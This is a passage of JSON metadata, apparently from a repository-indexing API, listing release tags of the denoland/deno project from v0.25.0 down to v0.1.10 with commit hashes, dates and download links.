:"pkg:github/denoland/deno@v0.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0/manifests"},{"name":"v0.24.0","sha":"0fffef8e5afed754358efc5b41d93549592cd941","kind":"commit","published_at":"2019-11-15T03:52:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0/manifests"},{"name":"v0.23.0","sha":"a611788834e40153ef27c8f1d6b7fd52c8a016b1","kind":"tag","published_at":"2019-11-05T02:50:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0/manifests"},{"name":"v0.22.0","sha":"71efe6f2c530d1cb9e8a2679f5778e2c034a9d0d","kind":"commit","published_at":"2019-10-28T18:12:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0/manifests"},{"name":"v0.21.0","sha":"4e88ba9a114279b3969d5ccca1cca0f74c8fc1fd","kind":"commit","published_at":"2019-10-19T22:46:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0/manifests"},{"name":"v0.20.0","sha":"a4b27db21a10f9913460c054c98fce59f3dd157d","kind":"commit","published_at":"2019-10-07T16:57:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0/manifests"},{"name":"v0.19.0","sha":"3892cf59018acd71dd4bc1099d747bd683cd4118","kind":"commit","published_at":"2019-09-25T14:58:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0/manifests"},{"name":"v0.18.0","sha":"7e3296dad92cee2e8b77baedfbeca38aa297928e","kind":"commit","published_at":"2019-09-13T20:40:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0/manifests"},{"name":"v0.17.0","sha":"82588ec09c199683cff88097e1b90649497239c7","kind":"commit","published_at":"2019-09-04T21:15:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0/manifests"},{"name":"v0.16.0","sha":"0809b06a3938868f364f1343b0de4d5d9686495d","kind":"tag","published_at":"2019-08-22T22:12:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0/manifests"},{"name":"v0.15.0","sha":"58f0e9b9b1b53ca486ef38ae662b98cbde839248","kind":"commit","published_at":"2019-08-13T22:35:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0/manifests"},{"name":"v0.14.0","sha":"83d5362f1d7d8589b862de57912135067a8278c7","kind":"tag","published_at":"2019-08-09T01:48:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0/manifests"},{"name":"v0.13.0","sha":"b3541c38f5672ffb4a29d66dca19d88b9ecae478","kind":"commit","published_at":"2019-07-31T19:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0/manifests"},{"name":"v0.12.0","sha":"4e248ecda9bb31478c6db7f5e76fa12b64b516a9","kind":"tag","published_at":"2019-07-16T20:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0/manifests"},{"name":"v0.11.0","sha":"92ac616708cb067a1b895283913c5ecd25c6d873","kind":"tag","published_at":"2019-07-07T16:19:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0/manifests"},{"name":"v0.10.0","sha":"c56df45355c8e68eabbfa62021e7ca7484115c0b","kind":"tag","published_at":"2019-06-25T14:11:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0/manifests"},{"name":"v0.9.0","sha":"7b06aa37342c021f9f1fac99125847d134e67001","kind":"commit","published_at":"2019-06-15T16:04:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0/manifests"},{"name":"v0.8.0","sha":"d60bdb6350f2583e35d020f6cebb6aa30262fbcc","kind":"commit","published_at":"2019-06-08T19:16:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0/manifests"},{"name":"v0.7.0","sha":"5265bd7cb1f86af99b01d73c537d52a50df95fe2","kind":"commit","published_at":"2019-05-29T22:42:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0/manifests"},{"name":"v0.6.0","sha":"22feb74ba12215597416b5531f8a557302283e79","kind":"commit","published_at":"2019-05-20T19:22:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0/manifests"},{"name":"v0.5.0","sha":"23aca36d52220efbfbc07abbe165bd2c9ade2009","kind":"commit","published_at":"2019-05-11T21:19:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0/manifests"},{"name":"v0.4.0","sha":"2aae09c2b869bf5d0bc5fd269464e8ac504528ea","kind":"commit","published_at":"2019-05-03T23:33:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0/manifests"},{"name":"v0.3.11","sha":"3b1e2f1ad42cfebb6f2568e54c82c5ac3c8fe3d4","kind":"commit","published_at":"2019-05-03T22:05:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11/manifests"},{"name":"v0.3.10","sha":"40d8ef1ec9f5e50017c41af8bf3b9f8454f97544","kind":"tag","published_at":"2019-04-25T20:00:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10/manifests"},{"name":"v0.3.9","sha":"e725b26b289fbe96b679039ba4203f10f7229ab9","kind":"tag","published_at":"2019-04-25T15:46:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9/manifests"},{"name":"v0.3.8","sha":"0796a8f2f75005df95ef6115a4bdf6dd66e58dc3","kind":"commit","published_at":"2019-04-19T15:41:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8/manifests"},{"name":"v0.3.7","sha":"8584d80cfd26111825af5a69fc6ae4c367ad0700","kind":"commit","published_at":"2019-04-11T19:35:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7/manifests"},{"name":"v0.3.6","sha":"744e56cb58f90acde7baf8811676021fb55b2f2a","kind":"tag","published_at":"2019-04-04T14:04:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6/manifests"},{"name":"v0.3.5","sha":"b965c7ab367a417fb7bdde2eaf38312179e5c183","kind":"commit","published_at":"2019-03-28T20:58:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5/manifests"},{"name":"v0.3.4","sha":"223a2adbb46cb33e75ffe861ecaff6ff7e6d555e","kind":"commit","published_at":"2019-03-20T22:54:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4/manifests"},{"name":"v0.3.3","sha":"3dbb06e699398549e8cfabc896ef3256ab433cba","kind":"tag","published_at":"2019-03-13T18:16:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3/manifests"},{"name":"v0.3.2","sha":"535037b519711d238dc0bfa2c4d2ffb4b17dec53","kind":"commit","published_at":"2019-03-07T02:22:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2/manifests"},{"name":"v0.3.1","sha":"b0c7b54f692ecc866d4f70bfa384631523bbf924","kind":"commit","published_at":"2019-02-27T21:20:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1/manifests"},{"name":"v0.3.0","sha":"a5720d9e28f7ee5868049504816405392c2821d7","kind":"commit","published_at":"2019-02-19T04:22:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0/manifests"},{"name":"v0.2.11","sha":"b2fb8261e700c75cfb9a626ae57bbd3098e08454","kind":"commit","published_at":"2019-02-09T04:34:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11/manifests"},{"name":"v0.2.10","sha":"c3241822522fb2b13792fe5666596888057cf829","kind":"commit","published_at":"2019-02-02T23:26:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10/manifests"},{"name":"v0.2.9","sha":"1681bda14d1552860645e40f91f667accefe50cb","kind":"commit","published_at":"2019-01-30T03:57:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9/manifests"},{"name":"v0.2.8","sha":"a47d545e4d0831713d0107e86cead7b4506a9bf6","kind":"commit","published_at":"2019-01-19T16:54:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8/manifests"},{"name":"v0.2.7","sha":"eb4a19ef6ef1c5ae797fb515c45627deca65cf31","kind":"commit","published_at":"2019-01-15T01:25:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7/manifests"},{"name":"v0.2.6","sha":"404e6f86345216c9205cabb88b19eaca762095e0","kind":"commit","published_at":"2019-01-07T22:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6/manifests"},{"name":"v0.2.5","sha":"320577c131c8058ba0065f26119ce1ce18bc23d2","kind":"commit","published_at":"2019-01-01T19:30:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5/manifests"},{"name":"v0.2.4","sha":"c6e2fffc1388cdb4411d6c2cff36c4febb7c75d5","kind":"commit","published_at":"2018-12-24T04:39:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4/manifests"},{"name":"v0.2.3","sha":"c69d2f554d05ba9e4d09af6ae451ce5676876e61","kind":"commit","published_at":"2018-12-14T20:11:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3/manifests"},{"name":"v0.2.2","sha":"e6121762f8bf3c531c4c60229ff4a156ae21d931","kind":"commit","published_at":"2018-12-07T22:44:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2/manifests"},{"name":"v0.2.1","sha":"b5c6bfa0c8a3df9598211bc68db5408f5eec147d","kind":"commit","published_at":"2018-12-01T00:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1/manifests"},{"name":"v0.2.0","sha":"d083f7271b11d87ddba90869d2bcd2cf312e77af","kind":"commit","published_at":"2018-11-16T05:23:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0/manifests"},{"name":"v0.1.12","sha":"0c740ff85d855177d1619276154f63a36ed31557","kind":"commit","published_at":"2018-11-12T17:16:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12/manifests"},{"name":"v0.1.11","sha":"e1d5f82d36f08b9c7a7c6233b7ce354a5cf82836","kind":"commit","published_at":"2018-11-05T22:51:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11/manifests"},{"name":"v0.1.10","sha":"da959e8c878382ce3417ab61db8ccf1ae9a660fa","kind":"commit","published_at":"2018-10-27T15:13:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fden